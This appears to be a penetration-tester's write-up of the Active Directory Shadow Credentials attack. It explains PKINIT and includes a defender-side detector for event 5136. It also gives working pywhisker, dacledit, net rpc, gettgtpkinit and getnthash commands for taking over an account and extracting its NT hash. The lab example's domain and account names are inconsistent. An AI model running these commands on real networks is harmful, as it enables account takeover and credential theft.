Shadow Credentials
Shadow credentials | AS-REQ | AS-REP | Account takeover
The Kerberos authentication protocol works with tickets: for example, a TGS (service ticket) can be obtained by presenting a TGT. That TGT is only issued after a first step, "pre-authentication", has been validated; when pre-authentication is disabled on an account, that account becomes vulnerable to AS-REP roasting. Pre-authentication can be validated symmetrically (with a DES, RC4, AES128 or AES256 key) or asymmetrically (with certificates).
The asymmetric way of pre-authenticating, using certificates, is called PKINIT.
PKINIT
In Kerberos authentication, clients must perform "pre-authentication" before the KDC issues a TGT, which can then be used to request Service Tickets. Without pre-authentication, anyone could request a reply encrypted with the account's key and attack the password offline, as in AS-REP Roasting.
Pre-authentication uses a timestamp to prevent replay attacks. The symmetric-key approach is by far the most common; the less common asymmetric-key approach works with a public-private key pair: the client encrypts the pre-authentication data with its private key and the KDC decrypts it with the public key. The KDC has its own key pair as well, which allows a session key to be exchanged.
Abuse
In order to exploit this technique we need:
At least one Windows Server 2016 Domain Controller with PKINIT support.
The Domain Controller must have a server authentication digital certificate installed, and the DC has its own key pair for the exchange.
Control over an account that can edit the target object's msDS-KeyCredentialLink attribute.
The attack
Create an RSA key pair
Create an X509 certificate configured with the public key
Create a KeyCredential structure featuring the raw public key and add it to the msDS-KeyCredentialLink attribute
Authenticate using PKINIT with the certificate and private key
python3 pywhisker.py -d "domain.local" -u "user1" -p "complexpassword" --target "user2" --action "add"
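As an added defender-side example (not part of the original page, and not pywhisker's or PKINITtools' code): a parser for the msDS-KeyCredentialLink value written in the third step above, plus detection logic over Windows Security event 5136 (directory service object modified) records, which is where such writes appear once directory service change auditing is enabled. The event records, the DeviceID and the key creation time are constructed sample data; the blob layout follows the MS-ADTS KEYCREDENTIALLINK_BLOB format (a 4-byte version, then entries of 2-byte length, 1-byte identifier and data), and events are taken as the EventData field dictionaries a SIEM would hand over.

```python
import struct
import uuid
from datetime import datetime, timedelta

VALUE_ADDED = "%%14674"   # event 5136 OperationType code for "Value Added"
ENTRY_NAMES = {1: "KeyID", 3: "KeyMaterial", 4: "KeyUsage", 6: "DeviceId", 9: "KeyCreationTime"}


def parse_key_credential_link(value):
    """Decode a DN-with-binary value 'B:<hexlen>:<hex>:<dn>' carrying a KEYCREDENTIALLINK_BLOB."""
    _, _, hexdata, dn = value.split(":", 3)
    blob = bytes.fromhex(hexdata)
    out, pos = {"dn": dn, "version": struct.unpack_from("<I", blob)[0]}, 4
    while pos + 3 <= len(blob):
        length, ident = struct.unpack_from("<HB", blob, pos)
        data, pos = blob[pos + 3:pos + 3 + length], pos + 3 + length
        if ident == 6:       # DeviceId is a GUID stored in little-endian layout
            out["DeviceId"] = str(uuid.UUID(bytes_le=data))
        elif ident == 9:     # KeyCreationTime is a FILETIME (100 ns ticks since 1601-01-01)
            ticks = struct.unpack("<Q", data)[0]
            out["KeyCreationTime"] = datetime(1601, 1, 1) + timedelta(microseconds=ticks // 10)
        else:
            out[ENTRY_NAMES.get(ident, f"entry_{ident}")] = data.hex()
    return out


def detect_shadow_credentials(events):
    """Alert when a KeyCredentialLink value is added to an object by an account other than
    the object itself; self-writes (Windows Hello / device enrolment) are the usual benign case."""
    alerts = []
    for ev in events:
        if (ev.get("OperationType") != VALUE_ADDED
                or ev.get("AttributeLDAPDisplayName", "").lower() != "msds-keycredentiallink"):
            continue
        target_cn = ev["ObjectDN"].split(",", 1)[0].split("=", 1)[1]
        if ev["SubjectUserName"].rstrip("$").lower() == target_cn.lower():
            continue
        key = parse_key_credential_link(ev["AttributeValue"])
        alerts.append({"writer": ev["SubjectUserName"], "target": ev["ObjectDN"],
                       "device_id": key.get("DeviceId"), "created": key.get("KeyCreationTime")})
    return alerts


def sample_events():
    """Constructed 5136 records: user1 adding a key to user2, then user2 writing its own key."""
    blob = (struct.pack("<I", 0x200) + struct.pack("<HB", 16, 6)
            + uuid.UUID("aacadbaa-8f06-2f9a-33ab-19bcad12694f").bytes_le
            + struct.pack("<HB", 8, 9) + struct.pack("<Q", 133_000_000_000_000_000))
    value = f"B:{len(blob.hex())}:{blob.hex()}:CN=user2,CN=Users,DC=domain,DC=local"
    base = {"OperationType": VALUE_ADDED, "AttributeLDAPDisplayName": "msDS-KeyCredentialLink",
            "ObjectDN": "CN=user2,CN=Users,DC=domain,DC=local", "AttributeValue": value}
    return [dict(base, SubjectUserName="user1"), dict(base, SubjectUserName="user2")]
```

The DeviceId recovered from the event value can be matched against the DeviceID that tooling like pywhisker prints when it adds the key, which ties the alert to the specific credential to remove.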
Shadow credential attack
An example attack using DACL abuse to retrieve an NT hash. In this scenario we have WriteOwner over user1 and GenericAll over user2.
# Grant user1 the WriteMembers right on the Zen group
python dacledit.py -action 'write' -rights 'WriteMembers' -principal 'user1' -target-dn 'CN=ZEN,CN=USERS,DC=CERTIFIED,DC=HTB' 'zencorp.aaa/user1':'pass123'
Next we add user1 to the Zen group.
# Add member to group Zen
net rpc group addmem "Zen" "user1" -U "zencorp.aaa"/"user1"%"pass123" -S "DC01.zencorp.htb"
Generate keys and certificate
python3 pywhisker.py -d "zencorp.aaa" -u "user1" -p 'pass123' --target "user2" --action "add"
# Will output
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: aacadbaa-8f06-2f9a-33ab-19bcad12694f
[*] Updating the msDS-KeyCredentialLink attribute of management_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: WElBKRZS.pfx
[*] Must be used with password: 1JHPFhefkg77PqfH8qGn
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
Now we can request a TGT
gettgtpkinit.py certified.htb/management_svc -cert-pfx WElBKRZS.pfx -pfx-pass '1JHPFhefkg77PqfH8qGn' user.ccache
Finally we can retrieve the NT hash
KRB5CCNAME=user.ccache python3 getnthash.py test.local/DC01\$ -key 6e63333c372d7fbe64dab63f36673d0cd03bfb92b2a6c96e70070be7cb07f773